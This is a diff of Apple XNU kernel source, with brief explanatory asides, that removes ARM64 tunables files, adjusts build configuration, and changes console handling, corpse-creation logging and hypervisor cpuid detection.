-       HID_SET_BITS ARM64_REG_HID8, (ARM64_REG_HID8_DataSetID0_VALUE | ARM64_REG_HID8_DataSetID1_VALUE), $1
-
-       /***** Tunables that apply to all P cores, all revisions *****/
-       /* N/A */
-
-       /***** Tunables that apply to all E cores, all revisions *****/
-       /* N/A */
-
-       /***** Tunables that apply to specific cores, all revisions *****/
-       EXEC_COREEQ_REVALL MIDR_CAPRI, $0, $1
-       HID_SET_BITS ARM64_REG_HID8, ARM64_REG_HID8_DataSetID2_VALUE, $1
-       EXEC_END
-
-       /***** Tunables that apply to specific cores and revisions *****/
-       /* N/A */
-
-       isb             sy
-.endmacro
\ No newline at end of file
diff --git a/osfmk/arm64/tunables/tunables_h8.s b/osfmk/arm64/tunables/tunables_h8.s
deleted file mode 100644 (file)
index 0f2a5d7..0000000
+++ /dev/null
@@ -1,60 +0,0 @@
-/*
- * Copyright (c) 2019 Apple Inc. All rights reserved.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
- *
- * This file contains Original Code and/or Modifications of Original Code
- * as defined in and that are subject to the Apple Public Source License
- * Version 2.0 (the 'License'). You may not use this file except in
- * compliance with the License. The rights granted to you under the License
- * may not be used to create, or enable the creation or redistribution of,
- * unlawful or unlicensed copies of an Apple operating system, or to
- * circumvent, violate, or enable the circumvention or violation of, any
- * terms of an Apple operating system software license agreement.
- *
- * Please obtain a copy of the License at
- * http://www.opensource.apple.com/apsl/ and read it before using this file.
- *
- * The Original Code and all software distributed under the License are
- * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
- * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
- * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
- * Please see the License for the specific language governing rights and
- * limitations under the License.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
- */
-.macro APPLY_TUNABLES
-       /***** Tunables that apply to all cores, all revisions *****/
-       HID_CLEAR_BITS ARM64_REG_HID11, ARM64_REG_HID11_DisFillC1BubOpt, $1
-
-       // Change the default memcache data set ID from 0 to 15 for all agents
-       HID_SET_BITS ARM64_REG_HID8, (ARM64_REG_HID8_DataSetID0_VALUE | ARM64_REG_HID8_DataSetID1_VALUE), $1
-       HID_SET_BITS ARM64_REG_HID8, (ARM64_REG_HID8_DataSetID2_VALUE | ARM64_REG_HID8_DataSetID3_VALUE), $1
-
-       // Use 4-cycle MUL latency to avoid denormal stalls
-       HID_SET_BITS ARM64_REG_HID7, ARM64_REG_HID7_disNexFastFmul, $1
-
-       // disable reporting of TLB-multi-hit-error
-       // <rdar://problem/22163216>
-       HID_CLEAR_BITS ARM64_REG_LSU_ERR_STS, ARM64_REG_LSU_ERR_STS_L1DTlbMultiHitEN, $1
-
-       /***** Tunables that apply to all P cores, all revisions *****/
-       /* N/A */
-
-       /***** Tunables that apply to all E cores, all revisions *****/
-       /* N/A */
-
-       /***** Tunables that apply to specific cores, all revisions *****/
-       /* N/A */
-
-       /***** Tunables that apply to specific cores and revisions *****/
-
-       // rdar://problem/36112905: Set CYC_CFG:skipInit to pull in isAlive by one DCLK
-       // to work around potential hang.  Must only be applied to Maui C0.
-       EXEC_COREEQ_REVEQ MIDR_MAUI, CPU_VERSION_C0, $0, $1
-       HID_SET_BITS ARM64_REG_CYC_CFG, ARM64_REG_CYC_CFG_skipInit, $1
-       EXEC_END
-       isb             sy
-.endmacro
\ No newline at end of file
diff --git a/osfmk/arm64/tunables/tunables_h9.s b/osfmk/arm64/tunables/tunables_h9.s
deleted file mode 100644 (file)
index c44e91c..0000000
+++ /dev/null
@@ -1,61 +0,0 @@
-/*
- * Copyright (c) 2019 Apple Inc. All rights reserved.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
- *
- * This file contains Original Code and/or Modifications of Original Code
- * as defined in and that are subject to the Apple Public Source License
- * Version 2.0 (the 'License'). You may not use this file except in
- * compliance with the License. The rights granted to you under the License
- * may not be used to create, or enable the creation or redistribution of,
- * unlawful or unlicensed copies of an Apple operating system, or to
- * circumvent, violate, or enable the circumvention or violation of, any
- * terms of an Apple operating system software license agreement.
- *
- * Please obtain a copy of the License at
- * http://www.opensource.apple.com/apsl/ and read it before using this file.
- *
- * The Original Code and all software distributed under the License are
- * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
- * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
- * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
- * Please see the License for the specific language governing rights and
- * limitations under the License.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
- */
-.macro APPLY_TUNABLES
-       /***** Tunables that apply to all cores, all revisions *****/
-
-       // IC prefetch configuration
-       // <rdar://problem/23019425>
-       HID_INSERT_BITS ARM64_REG_HID0, ARM64_REG_HID0_ICPrefDepth_bmsk, ARM64_REG_HID0_ICPrefDepth_VALUE, $1
-       HID_SET_BITS ARM64_REG_HID0, ARM64_REG_HID0_ICPrefLimitOneBrn, $1
-
-       // disable reporting of TLB-multi-hit-error
-       // <rdar://problem/22163216>
-       HID_CLEAR_BITS ARM64_REG_LSU_ERR_CTL, ARM64_REG_LSU_ERR_CTL_L1DTlbMultiHitEN, $1
-
-       // disable crypto fusion across decode groups
-       // <rdar://problem/27306424>
-       HID_SET_BITS ARM64_REG_HID1, ARM64_REG_HID1_disAESFuseAcrossGrp, $1
-
-       /***** Tunables that apply to all P cores, all revisions *****/
-       /* N/A */
-
-       /***** Tunables that apply to all E cores, all revisions *****/
-       /* N/A */
-
-       /***** Tunables that apply to specific cores, all revisions *****/
-       EXEC_COREEQ_REVALL MIDR_MYST, $0, $1
-       // Clear DisDcZvaCmdOnly
-       // Per Myst A0/B0 tunables document
-       // <rdar://problem/27627428> Myst: Confirm ACC Per-CPU Tunables
-       HID_CLEAR_BITS ARM64_REG_HID3, ARM64_REG_HID3_DisDcZvaCmdOnly, $1
-       HID_CLEAR_BITS ARM64_REG_EHID3, ARM64_REG_HID3_DisDcZvaCmdOnly, $1
-       EXEC_END
-
-       /***** Tunables that apply to specific cores and revisions *****/
-       /* N/A */
-.endmacro
\ No newline at end of file
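The HID_SET_BITS / HID_CLEAR_BITS / HID_INSERT_BITS macros used throughout these tunable files appear to perform read-modify-write updates of implementation-defined HID registers. The register access itself is not shown here, but the bit arithmetic they apply is essentially the following (illustrative C helpers, not the actual macro bodies):

    #include <stdint.h>

    /* Set, clear, or field-insert bits in a 64-bit register image. */
    static inline uint64_t
    hid_set_bits(uint64_t reg, uint64_t bits)
    {
            return reg | bits;
    }

    static inline uint64_t
    hid_clear_bits(uint64_t reg, uint64_t bits)
    {
            return reg & ~bits;
    }

    static inline uint64_t
    hid_insert_bits(uint64_t reg, uint64_t mask, uint64_t value)
    {
            /* replace only the bits covered by mask with the given value */
            return (reg & ~mask) | (value & mask);
    }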
index bdf7fe02e3ea4e4edd0000be9142a562a449acdd..a09b5d2c3df4044d5d1129e4fa68290af182ff12 100644 (file)
@@ -132,7 +132,6 @@ uat.o_CFLAGS_ADD += -Wno-implicit-int-conversion
 video_console.o_CFLAGS_ADD += -Wno-implicit-int-conversion
 xcpm_dvfs.o_CFLAGS_ADD += -Wno-implicit-int-conversion
 xcpm_ioctl.o_CFLAGS_ADD += -Wno-implicit-int-conversion
-zalloc.o_CFLAGS_ADD += -Wno-implicit-int-conversion
 # -Wno-shorten-64-to-32
 arm_vm_init.o_CFLAGS_ADD += -Wno-shorten-64-to-32
 backtrace.o_CFLAGS_ADD += -Wno-shorten-64-to-32
@@ -166,7 +165,6 @@ vm_object.o_CFLAGS_ADD += -Wno-shorten-64-to-32
 vm_shared_region_pager.o_CFLAGS_ADD += -Wno-shorten-64-to-32
 vm_swapfile_pager.o_CFLAGS_ADD += -Wno-shorten-64-to-32
 vm_user.o_CFLAGS_ADD += -Wno-shorten-64-to-32
-zalloc.o_CFLAGS_ADD += -Wno-shorten-64-to-32
 # -Wno-sign-conversion
 Diagnostics.o_CFLAGS_ADD += -Wno-sign-conversion
 acpi.o_CFLAGS_ADD += -Wno-sign-conversion
@@ -368,8 +366,6 @@ xcpm_dvfs.o_CFLAGS_ADD += -Wno-sign-conversion
 xcpm_fi.o_CFLAGS_ADD += -Wno-sign-conversion
 xcpm_idle.o_CFLAGS_ADD += -Wno-sign-conversion
 xcpm_ioctl.o_CFLAGS_ADD += -Wno-sign-conversion
-zalloc.o_CFLAGS_ADD += -Wno-sign-conversion
-zcache.o_CFLAGS_ADD += -Wno-sign-conversion
 
 # Rebuild if per-file overrides change
 ${OBJS}: $(firstword $(MAKEFILE_LIST))
index 991216abdd7c32829aea235a79cd2ffbb5c34e63..a7e18d8955bb3a2581134f58d129cbfb66b90a8f 100644 (file)
@@ -49,7 +49,6 @@ OPTIONS/mach_vm_debug         optional mach_vm_debug
 OPTIONS/mach_page_hash_stats    optional mach_page_hash_stats
 OPTIONS/mig_debug              optional mig_debug
 OPTIONS/vm_cpm                 optional vm_cpm
-OPTIONS/task_swapper           optional task_swapper
 OPTIONS/stack_usage            optional stack_usage
 OPTIONS/importance_inheritance optional importance_inheritance
 OPTIONS/importance_debug       optional importance_debug
@@ -79,8 +78,8 @@ OPTIONS/config_quiesce_counter  optional config_quiesce_counter
 #
 # UserNotification files
 #
-./UserNotification/UNDRequest.c                        standard
-./UserNotification/UNDReplyServer.c            standard
+./UserNotification/UNDRequest.c                        optional config_user_notification
+./UserNotification/UNDReplyServer.c            optional config_user_notification
 osfmk/UserNotification/KUNCUserNotifications.c standard
 
 osfmk/kdp/kdp.c                        optional config_kdp_interactive_debugging
@@ -120,7 +119,7 @@ osfmk/kern/build_config.c           standard
 osfmk/kern/clock.c                     standard
 osfmk/kern/clock_oldops.c              standard
 osfmk/kern/coalition.c                 optional config_coalitions
-osfmk/kern/counters.c                  standard
+osfmk/kern/counter_common.c            standard
 osfmk/kern/cpu_quiesce.c               optional config_quiesce_counter
 osfmk/kern/debug.c                     standard
 osfmk/kern/ecc_logging.c                       optional config_ecc_logging
@@ -175,7 +174,6 @@ osfmk/kern/syscall_sw.c             standard
 osfmk/kern/sysdiagnose.c       optional config_sysdiagnose
 osfmk/kern/task.c                      standard
 osfmk/kern/task_policy.c       standard
-osfmk/kern/task_swap.c         standard
 osfmk/kern/test_lock.c         optional development
 osfmk/kern/test_lock.c         optional debug
 osfmk/kern/test_mpsc_queue.c   optional development
@@ -192,7 +190,6 @@ osfmk/kern/ux_handler.c             standard
 osfmk/kern/waitq.c                     standard
 osfmk/kern/work_interval.c             standard
 osfmk/kern/zalloc.c                    standard
-osfmk/kern/zcache.c            optional config_zcache
 osfmk/kern/gzalloc.c           optional config_gzalloc
 osfmk/kern/bsd_kern.c          optional mach_bsd
 osfmk/kern/hibernate.c         optional hibernation
@@ -200,6 +197,7 @@ osfmk/kern/remote_time.c        standard
 osfmk/kern/memset_s.c          standard
 osfmk/kern/copyout_shim.c      optional copyout_shim
 osfmk/kern/suid_cred.c         standard
+osfmk/kern/task_ident.c     standard
 
 ./mach/clock_server.c                  standard
 ./mach/clock_priv_server.c             standard
@@ -250,6 +248,7 @@ osfmk/voucher/ipc_pthread_priority.c                standard
 ./mach/fairplayd_notification_user.c optional config_arcade
 ./mach/arcade_upcall_user.c optional config_arcade
 ./mach/arcade_register_server.c optional config_arcade
+./mach/iocompressionstats_notification_user.c optional config_io_compression_stats
 
 #
 # For now, no external pagers
index 74181f5e9a362b6c0210b949d50496155039dfc3..1d0f04be6ccc5a6b03ede067fa8d59413ecd0555 100644 (file)
@@ -53,6 +53,7 @@ osfmk/arm/trustcache.c                standard
 osfmk/arm/model_dep.c          standard
 osfmk/arm/pcb.c                standard
 osfmk/arm/rtclock.c            standard
+osfmk/arm/counter.c            standard
 osfmk/arm/status.c             standard
 osfmk/arm/status_shared.c      standard
 osfmk/arm/trap.c               standard
index b8f235bdb9e629ce951269c76688a0e20f6670dc..266a05ca1263b6be0fc395753a4f31303ac35c1a 100644 (file)
@@ -96,3 +96,5 @@ osfmk/arm64/pgtrace.c           standard
 osfmk/arm64/pgtrace_decoder.c   optional config_pgtrace_nonkext
 osfmk/arm64/machine_remote_time.c optional config_mach_bridge_recv_time
 osfmk/arm64/corecrypto/sha256_compress_arm64.s standard
+
+osfmk/arm/counter.c    standard
index 5393a8cd6f814ef67a5c7d147c07798801084770..37136bd6387b2234c5c7914d55ce7649218019b9 100644 (file)
@@ -94,8 +94,10 @@ osfmk/i386/ucode.c                           standard
 
 osfmk/i386/vmx/vmx_cpu.c                       optional config_vmx
 osfmk/i386/vmx/vmx_shims.c                     optional config_vmx
+osfmk/i386/x86_hypercall.c                     optional development
 
 osfmk/kern/hv_support_kext.c                   optional hypervisor
+osfmk/kern/hv_io_notifier.c                    optional hypervisor
 
 # DUMMIES TO FORCE GENERATION OF .h FILES
 #osfmk/OPTIONS/ln              optional ln
@@ -114,3 +116,4 @@ osfmk/x86_64/idt64.s                standard
 osfmk/i386/panic_hooks.c       standard
 osfmk/i386/panic_notify.c      standard
 osfmk/x86_64/machine_remote_time.c             optional config_mach_bridge_send_time
+osfmk/x86_64/counter.c         standard
index 586562011ad4e35da5354b96653ba8098ea671b9..980a7810d3c36e1cf9abc3504b4693f2c5957959 100644 (file)
@@ -317,7 +317,15 @@ get_cons_ops_index(void)
 static inline void
 _cnputs(char * c, int size)
 {
-       uint32_t idx = get_cons_ops_index();
+       extern int disableConsoleOutput;
+
+       if (disableConsoleOutput) {
+               return;
+       }
+
+       assert(c != NULL);
+
+       const uint32_t idx = get_cons_ops_index();
 
        while (size-- > 0) {
                if (*c == '\n') {
index 62bde9741ec1acdd9c949d31b9628e6415db09ca..34ba2b4e44f3521ef6344f049bfe5aa828bed105 100644 (file)
@@ -113,8 +113,13 @@ switch_to_video_console(void)
 int
 switch_to_serial_console(void)
 {
+       extern bool serial_console_enabled;
        int old_cons_ops = cons_ops_index;
-       cons_ops_index = SERIAL_CONS_OPS;
+
+       if (serial_console_enabled) {
+               cons_ops_index = SERIAL_CONS_OPS;
+       }
+
        return old_cons_ops;
 }
 
index d440c79bd3418b4bd750083256def0124224324b..fcb67e2020192de9e051385b029d33a422060c1e 100644 (file)
 #include <kern/kern_cdata.h>
 #include <mach/mach_vm.h>
 #include <kern/exc_guard.h>
+#include <os/log.h>
 
 #if CONFIG_MACF
 #include <security/mac_mach_internal.h>
@@ -218,6 +219,9 @@ total_corpses_count(void)
        return gate.corpses;
 }
 
+extern char *proc_best_name(struct proc *);
+extern int proc_pid(struct proc *);
+
 /*
  * Routine: task_crashinfo_get_ref()
  *          Grab a slot at creating a corpse.
@@ -227,6 +231,7 @@ static kern_return_t
 task_crashinfo_get_ref(corpse_flags_t kcd_u_flags)
 {
        union corpse_creation_gate oldgate, newgate;
+       struct proc *p = (void *)current_proc();
 
        assert(kcd_u_flags & CORPSE_CRASHINFO_HAS_REF);
 
@@ -235,10 +240,14 @@ task_crashinfo_get_ref(corpse_flags_t kcd_u_flags)
                newgate = oldgate;
                if (kcd_u_flags & CORPSE_CRASHINFO_USER_FAULT) {
                        if (newgate.user_faults++ >= TOTAL_USER_FAULTS_ALLOWED) {
+                               os_log(OS_LOG_DEFAULT, "%s[%d] Corpse failure, too many faults %d\n",
+                                   proc_best_name(p), proc_pid(p), newgate.user_faults);
                                return KERN_RESOURCE_SHORTAGE;
                        }
                }
                if (newgate.corpses++ >= TOTAL_CORPSES_ALLOWED) {
+                       os_log(OS_LOG_DEFAULT, "%s[%d] Corpse failure, too many %d\n",
+                           proc_best_name(p), proc_pid(p), newgate.corpses);
                        return KERN_RESOURCE_SHORTAGE;
                }
 
@@ -246,6 +255,8 @@ task_crashinfo_get_ref(corpse_flags_t kcd_u_flags)
                if (atomic_compare_exchange_strong_explicit(&inflight_corpses,
                    &oldgate.value, newgate.value, memory_order_relaxed,
                    memory_order_relaxed)) {
+                       os_log(OS_LOG_DEFAULT, "%s[%d] Corpse allowed %d of %d\n",
+                           proc_best_name(p), proc_pid(p), newgate.corpses, TOTAL_CORPSES_ALLOWED);
                        return KERN_SUCCESS;
                }
        }
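The logging added in this function sits inside a lock-free admission gate: the corpse and user-fault counters share one word, a local copy is incremented and range-checked, and the update only takes effect when the compare-and-exchange against the original value succeeds. A stripped-down sketch of that pattern with a plain counter, not the xnu corpse_creation_gate types:

    #include <stdatomic.h>
    #include <stdbool.h>
    #include <stdint.h>

    #define GATE_LIMIT 5

    static _Atomic uint32_t gate;

    /* Returns true if a slot was reserved, false if the limit was reached. */
    static bool
    gate_get_ref(void)
    {
            uint32_t old = atomic_load_explicit(&gate, memory_order_relaxed);
            for (;;) {
                    if (old >= GATE_LIMIT) {
                            return false;   /* too many in flight */
                    }
                    if (atomic_compare_exchange_strong_explicit(&gate, &old, old + 1,
                        memory_order_relaxed, memory_order_relaxed)) {
                            return true;    /* reservation committed */
                    }
                    /* CAS failed: old now holds the current value, retry */
            }
    }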
@@ -277,6 +288,7 @@ task_crashinfo_release_ref(corpse_flags_t kcd_u_flags)
                if (atomic_compare_exchange_strong_explicit(&inflight_corpses,
                    &oldgate.value, newgate.value, memory_order_relaxed,
                    memory_order_relaxed)) {
+                       os_log(OS_LOG_DEFAULT, "Corpse released, count at %d\n", newgate.corpses);
                        return KERN_SUCCESS;
                }
        }
@@ -653,7 +665,7 @@ error_task_generate_corpse:
                        /* Terminate all the other threads in the task. */
                        queue_iterate(&new_task->threads, thread_next, thread_t, task_threads)
                        {
-                               thread_terminate_internal(thread_next);
+                               thread_terminate_internal(thread_next, TH_TERMINATE_OPTION_NONE);
                        }
                        /* wait for all the threads in the task to terminate */
                        task_wait_till_threads_terminate_locked(new_task);
index f7102315801b851d702bd3b5a9b6046008bad197..6c1c7fac36c69fb8495100ef99a33f25da9059d0 100644 (file)
@@ -41,7 +41,6 @@
 
 #include <kern/clock.h>
 #include <kern/spl.h>
-#include <kern/counters.h>
 #include <kern/queue.h>
 #include <kern/zalloc.h>
 #include <kern/thread.h>
@@ -181,6 +180,12 @@ iokit_release_port( ipc_port_t port )
        ipc_port_release( port );
 }
 
+EXTERN void
+iokit_make_port_send( ipc_port_t port )
+{
+       ipc_port_make_send( port );
+}
+
 EXTERN void
 iokit_release_port_send( ipc_port_t port )
 {
@@ -310,9 +315,8 @@ iokit_make_send_right( task_t task, io_object_t obj, ipc_kobject_type_t type )
                // thread-argument-passing and its value should not be garbage
                current_thread()->ith_knote = ITH_KNOTE_NULL;
                kr = ipc_object_copyout( task->itk_space, ip_to_object(sendPort),
-                   MACH_MSG_TYPE_PORT_SEND, NULL, NULL, &name);
+                   MACH_MSG_TYPE_PORT_SEND, IPC_OBJECT_COPYOUT_FLAGS_NONE, NULL, NULL, &name);
                if (kr != KERN_SUCCESS) {
-                       ipc_port_release_send( sendPort );
                        name = MACH_PORT_NULL;
                }
        } else if (sendPort == IP_NULL) {
index 06391748edea5120daefa463dd6593e47c13c985..2d6d61ec1f755843f4301c6f032515c9a2144b3f 100644 (file)
@@ -18,6 +18,7 @@ EXPORT_ONLY_FILES =   \
                    cpuid.h \
                    eflags.h \
                    fpu.h \
+                       x86_hypercall.h \
                    io_map_entries.h \
                    lapic.h \
                    lock.h \
index d4e14d5118bbe15657d89d271aa42062c15324f7..2af7ed288cdeb4d23928625d0cd82271a0bbb36c 100644 (file)
@@ -347,6 +347,12 @@ acpi_sleep_kernel(acpi_sleep_callback func, void *refcon)
        init_fpu();
        clear_ts();
 
+
+#if HYPERVISOR
+       /* Notify hypervisor that we are about to resume */
+       hv_resume();
+#endif
+
        IOCPURunPlatformActiveActions();
 
        KDBG(IOKDBG_CODE(DBG_HIBERNATE, 0) | DBG_FUNC_END, start, elapsed,
@@ -361,7 +367,6 @@ acpi_sleep_kernel(acpi_sleep_callback func, void *refcon)
        /* Restart timer interrupts */
        rtc_timer_start();
 
-
 #if MONOTONIC
        mt_cpu_up(cdp);
 #endif /* MONOTONIC */
index 7c01567eae02a17b628fea8122e9172bd2e645ba..b25d0f5d6b5f4853e2ff2c2ab2cf0afc554f0c43 100644 (file)
@@ -34,7 +34,6 @@
 #include <mach/thread_status.h>
 #include <mach/vm_param.h>
 
-#include <kern/counters.h>
 #include <kern/cpu_data.h>
 #include <kern/mach_param.h>
 #include <kern/task.h>
@@ -483,7 +482,7 @@ mach_call_arg_munger32(uint32_t sp, struct mach_call_args *args, const mach_trap
 
 __private_extern__ void mach_call_munger(x86_saved_state_t *state);
 
-extern const char *mach_syscall_name_table[];
+extern const char *const mach_syscall_name_table[];
 
 __attribute__((noreturn))
 void
index 541ec6a727a8041f1836002e8f37a338bc41d71c..e117ddda986c6b6d3d1a0b3313f2a03aef950ca9 100644 (file)
@@ -33,7 +33,6 @@
 #include <mach/thread_status.h>
 #include <mach/vm_param.h>
 
-#include <kern/counters.h>
 #include <kern/cpu_data.h>
 #include <kern/mach_param.h>
 #include <kern/task.h>
index c0b62d37b66063dbfcd7cd72a29ff472ca4d4ecc..a6ef153a71baf649211c389fb1f69cf21368270e 100644 (file)
@@ -155,6 +155,10 @@ _NumCPUs( void )
 
 #else /* !KERNEL_PRIVATE */
 
+/*
+ * <sys/commpage.h> defines a couple of convenience macros
+ * to help read data from the commpage.
+ */
 #if defined(__i386__)
 
 #define _COMM_PAGE_AREA_LENGTH          _COMM_PAGE32_AREA_LENGTH
index 06ad4090d24dc89303c8503c081d18963fc8ffa7..90844be06efc9b144cabc0cb7c84cea8ea70f53a 100644 (file)
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2000-2019 Apple Inc. All rights reserved.
+ * Copyright (c) 2000-2020 Apple Inc. All rights reserved.
  *
  * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
  *
@@ -219,6 +219,12 @@ boolean_t cpuid_tsx_supported = false;
 static void do_cwas(i386_cpu_info_t *cpuinfo, boolean_t on_slave);
 static void cpuid_do_precpuid_was(void);
 
+#if DEBUG || DEVELOPMENT
+static void cpuid_vmm_detect_pv_interface(i386_vmm_info_t *info_p, const char *signature,
+    bool (*)(i386_vmm_info_t*, const uint32_t, const uint32_t));
+static bool cpuid_vmm_detect_applepv_features(i386_vmm_info_t *info_p, const uint32_t base, const uint32_t max_leaf);
+#endif /* DEBUG || DEVELOPMENT */
+
 static inline cpuid_cache_descriptor_t *
 cpuid_leaf2_find(uint8_t value)
 {
@@ -1437,6 +1443,10 @@ cpuid_init_vmm_info(i386_vmm_info_t *info_p)
                info_p->cpuid_vmm_bus_frequency = reg[ebx];
        }
 
+#if DEBUG || DEVELOPMENT
+       cpuid_vmm_detect_pv_interface(info_p, APPLEPV_SIGNATURE, &cpuid_vmm_detect_applepv_features);
+#endif
+
        DBG(" vmm_vendor          : %s\n", info_p->cpuid_vmm_vendor);
        DBG(" vmm_family          : %u\n", info_p->cpuid_vmm_family);
        DBG(" vmm_bus_frequency   : %u\n", info_p->cpuid_vmm_bus_frequency);
@@ -1465,6 +1475,14 @@ cpuid_vmm_family(void)
        return cpuid_vmm_info()->cpuid_vmm_family;
 }
 
+#if DEBUG || DEVELOPMENT
+uint64_t
+cpuid_vmm_get_applepv_features(void)
+{
+       return cpuid_vmm_info()->cpuid_vmm_applepv_features;
+}
+#endif /* DEBUG || DEVELOPMENT */
+
 cwa_classifier_e
 cpuid_wa_required(cpu_wa_e wa)
 {
@@ -1596,3 +1614,68 @@ cpuid_do_precpuid_was(void)
                cpuid_tsx_disabled = true;
        }
 }
+
+
+#if DEBUG || DEVELOPMENT
+
+/*
+ * Hunt for Apple Paravirtualization support in the hypervisor class leaves [0x4000_0000-0x4001_0000].
+ * Hypervisor interfaces are expected to be found at 0x100 boundaries for compatibility.
+ */
+
+static bool
+cpuid_vmm_detect_applepv_features(i386_vmm_info_t *info_p, const uint32_t base, const uint32_t max_leaf)
+{
+       if ((max_leaf - base) < APPLEPV_LEAF_INDEX_MAX) {
+               return false;
+       }
+
+       /*
+        * Issue cpuid to make sure the interface supports "AH#1" features.
+        * This avoids a possible collision with "Hv#1" used by Hyper-V.
+        */
+       uint32_t reg[4];
+       char interface[5];
+       cpuid_fn(base + APPLEPV_INTERFACE_LEAF_INDEX, reg);
+       memcpy(&interface[0], &reg[eax], 4);
+       interface[4] = '\0';
+       if (0 == strcmp(interface, APPLEPV_INTERFACE)) {
+               cpuid_fn(base + APPLEPV_FEATURES_LEAF_INDEX, reg);
+               info_p->cpuid_vmm_applepv_features = quad(reg[ecx], reg[edx]);
+               return true;
+       }
+       return false;
+}
+
+static void
+cpuid_vmm_detect_pv_interface(i386_vmm_info_t *info_p, const char *signature,
+    bool (*searcher)(i386_vmm_info_t*, const uint32_t, const uint32_t))
+{
+       int hcalls;
+       if (PE_parse_boot_argn("hcalls", &hcalls, sizeof(hcalls)) &&
+           hcalls == 0) {
+               return;
+       }
+
+       assert(info_p);
+       /*
+        * Look for PV interface matching signature
+        */
+       for (uint32_t base = 0x40000100; base < 0x40010000; base += 0x100) {
+               uint32_t reg[4];
+               char vendor[13];
+
+               cpuid_fn(base, reg);
+               memcpy(&vendor[0], &reg[ebx], 4);
+               memcpy(&vendor[4], &reg[ecx], 4);
+               memcpy(&vendor[8], &reg[edx], 4);
+               vendor[12] = '\0';
+               if ((0 == strcmp(vendor, signature)) &&
+                   (reg[eax] - base) < 0x100 &&
+                   (*searcher)(info_p, base, reg[eax])) {
+                       break;
+               }
+       }
+}
+
+#endif /* DEBUG || DEVELOPMENT */
index 577bf616797aa3abbc77abec8fa0618dcbd10c9e..3f608f707e2c3639650ade3061675106d24ccdd4 100644 (file)
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2000-2019 Apple Computer, Inc. All rights reserved.
+ * Copyright (c) 2000-2020 Apple Computer, Inc. All rights reserved.
  *
  * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
  *
 #define CPUID_VMM_FAMILY_KVM            0x6
 
 
+#if DEBUG || DEVELOPMENT
+
+/*
+ * Apple Paravirtualization CPUID leaves
+ * The base leaf can be placed at any unused 0x100 aligned boundary
+ * in the hypervisor class leaves [0x4000_0000-0x4001_0000].
+ */
+
+#define APPLEPV_INTERFACE_LEAF_INDEX    1
+#define APPLEPV_FEATURES_LEAF_INDEX     2
+#define APPLEPV_LEAF_INDEX_MAX          APPLEPV_FEATURES_LEAF_INDEX
+
+#define APPLEPV_SIGNATURE               "apple-pv-xnu"
+#define APPLEPV_INTERFACE               "AH#1"
+
+/*
+ *  Apple Hypercall Feature Vector:
+ *  Values in ECX:EDX returned by the base leaf
+ */
+
+#define CPUID_LEAF_FEATURE_COREDUMP         _Bit(0)
+
+#endif /* DEBUG || DEVELOPMENT */
+
 
 #ifndef ASSEMBLER
 #include <stdint.h>
@@ -485,6 +509,7 @@ typedef struct {
        uint32_t        cpuid_vmm_family;
        uint32_t        cpuid_vmm_bus_frequency;
        uint32_t        cpuid_vmm_tsc_frequency;
+       uint64_t        cpuid_vmm_applepv_features;
 } i386_vmm_info_t;
 
 typedef enum {
@@ -553,10 +578,14 @@ extern uint32_t         cpuid_cpufamily(void);
 extern i386_cpu_info_t  *cpuid_info(void);
 extern void             cpuid_set_info(void);
 extern boolean_t        cpuid_vmm_present(void);
+extern uint32_t         cpuid_vmm_family(void);
+
+#if DEBUG || DEVELOPMENT
+extern uint64_t         cpuid_vmm_get_applepv_features(void);
+#endif /* DEBUG || DEVELOPMENT */
 
 #ifdef MACH_KERNEL_PRIVATE
 extern i386_vmm_info_t  *cpuid_vmm_info(void);
-extern uint32_t         cpuid_vmm_family(void);
 extern cwa_classifier_e cpuid_wa_required(cpu_wa_e wa);
 extern void cpuid_do_was(void);
 extern const char       *cpuid_vmm_family_string(void);
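Taken together, the cpuid.c and cpuid.h hunks let DEBUG/DEVELOPMENT kernels detect the Apple paravirtualization interface and expose its feature vector. A short usage sketch; the wrapper function below is invented for illustration, while cpuid_vmm_present(), cpuid_vmm_get_applepv_features(), and CPUID_LEAF_FEATURE_COREDUMP come from the diff:

    #include <stdbool.h>

    #if DEBUG || DEVELOPMENT
    /* Hypothetical caller: check one bit of the AH#1 feature vector. */
    static bool
    applepv_supports_coredump(void)
    {
            if (!cpuid_vmm_present()) {
                    return false;   /* not running under a hypervisor */
            }
            /* Feature bits are the ECX:EDX pair returned by the features leaf. */
            return (cpuid_vmm_get_applepv_features() & CPUID_LEAF_FEATURE_COREDUMP) != 0;
    }
    #endif /* DEBUG || DEVELOPMENT */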
index 12cdef33aa3737c1db754d7747b97985bbb1e4ec..ad1f15c1f8d08cc3199a1835ed6ec0daae68b770 100644 (file)
@@ -129,6 +129,8 @@ int                     debug_task;
 
 int                     early_boot = 1;
 
+bool                    serial_console_enabled = false;
+
 static boot_args        *kernelBootArgs;
 
 extern int              disableConsoleOutput;
@@ -932,6 +934,7 @@ i386_init(void)
                }
        }
        if (serialmode & SERIALMODE_OUTPUT) {
+               serial_console_enabled = true;
                (void)switch_to_serial_console();
                disableConsoleOutput = FALSE; /* Allow printfs to happen */
        }
index 98d11ec507d4ae9d6b618c7ed502370841946cb7..8d6903b5ac87183d576a02c25ce1bd127ea6b63b 100644 (file)
@@ -126,6 +126,15 @@ decl_simple_lock_data(extern, panic_lock);
 
 extern unsigned int not_in_kdp;
 
+#if !LOCK_STATS
+#define usimple_lock_nopreempt(lck, grp) \
+       usimple_lock_nopreempt(lck)
+#define usimple_lock_try_nopreempt(lck, grp) \
+       usimple_lock_try_nopreempt(lck)
+#endif
